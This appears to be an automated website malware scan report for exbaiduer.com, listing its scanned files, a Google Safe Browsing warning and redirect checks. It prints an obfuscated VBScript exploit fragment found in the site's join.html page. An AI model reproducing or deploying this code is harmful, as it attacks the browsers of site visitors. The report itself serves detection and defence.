Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exbaiduer.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://exbaiduer.com/ | 200 OK Content-Length: 1927 Content-Type: text/html | clean |
http://exbaiduer.com/js/jquery-1.11.0.min.js | 200 OK Content-Length: 96381 Content-Type: text/javascript | clean |
http://exbaiduer.com/js/blh.js | 200 OK Content-Length: 1228 Content-Type: text/javascript | clean |
http://s22.cnzz.com/z_stat.php?id=1000265978&web_id=1000265978 | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://exbaiduer.com/join.html | 200 OK Content-Length: 95806 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) On Error Resume Next Dim jjvmscqvm,eoyehpnucwq,hcanmotm eoyehpnucwq = -7 hcanmotm = 0 jjvmscqvm = 5493 Dim wowpfncfxjpy(5493) Set rlfrssnkd = ohkmrqpss.requiredClaims For snpdtrgfvmy = hcanmotm to jjvmscqvm Set wowpfncfxjpy(snpdtrgfvmy) = document.createElement("object") Next For snpdtrgfvmy = 4093 to jjvmscqvm Step 2 wowpfncfxjpy(snpdtrgfvmy) = Null Next For cxdgertanzbp = hcanmotm to eoyehpnucwq Step -1 rlfrssnkd.remove(CLng(cxdgertanzbp)) Next Dim nafrfznljlz,ggggggggg ggggggggg=ddddd() nafrfznljlz = dlrciyrnpnl() rlfrssnkd.add(nafrfznljlz) rlfrssnkd.add("AAAAAAAAAAAAAAAAAAAAAA") rlfrssnkd.add(ggggggggg) For zapkxleagfv = hcanmotm to jjvmscqvm if wowpfncfxjpy(zapkxleagfv) <> Null Then wowpfncfxjpy(zapkxleagfv).focus End If Next For bxrppjvjy = hcanmotm to jjvmscqvm wowpfncfxjpy(bxrppjvjy) = Null Next Antivirus reports:
| ||
http://exbaiduer.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: exbaiduer.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 20:44:02 GMT
Accept-Ranges: bytes
ETag: "ad43b5-787-4f38f60a2d680"
Server: Apache/2.2.15 (CentOS)
Content-Length: 1927
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 01 Mar 2014 18:03:54 GMT
...1927 bytes of data.
GET / HTTP/1.1
Host: exbaiduer.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 20:44:02 GMT
Accept-Ranges: bytes
ETag: "ad43b5-787-4f38f60a2d680"
Server: Apache/2.2.15 (CentOS)
Content-Length: 1927
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 01 Mar 2014 18:03:54 GMT
...1927 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: exbaiduer.com
Referer: http://www.google.com/search?q=exbaiduer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: exbaiduer.com
Referer: http://www.google.com/search?q=exbaiduer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.